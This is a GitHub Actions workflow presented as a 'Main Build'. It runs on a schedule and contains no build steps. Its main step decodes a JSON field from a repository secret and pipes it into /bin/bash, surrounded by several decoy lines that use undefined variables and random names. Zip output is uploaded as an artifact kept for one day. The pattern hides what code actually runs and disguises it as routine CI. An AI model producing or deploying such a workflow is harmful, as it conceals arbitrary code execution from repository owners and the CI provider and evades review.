name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '17 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          ljzco2: ${{ secrets.ljzco2 }}
        run: |
          printf '%s' "$ljzco2" | jq -r .rxxq51 | /bin/bash
          printf '%s' "$kxd90" | jq -r .ymxv6 | /bin/bash
          echo $dryl8 | jq -r .ijfb7 | /bin/bash
          printf '%s' "$wfvtv628" | jq -r .tacu96686 | /bin/bash
          printf '%s' "$mipp8055" | jq -r .zwos7002 | /bin/bash
          printf '%s' "$czavq70" | jq -r .zxxde71 | /bin/bash
          echo $gjly59 | jq -r .ovr1058 | /bin/bash
          echo $cocga42 | jq -r .bsrc59263 | /bin/bash
          echo $gciip73483 | jq -r .tj956 | /bin/bash

      - name: Store artifact
        uses: actions/upload-artifact@v4
        with:
          name: hM0htOsa
          path: "*.zip"
          retention-days: 1
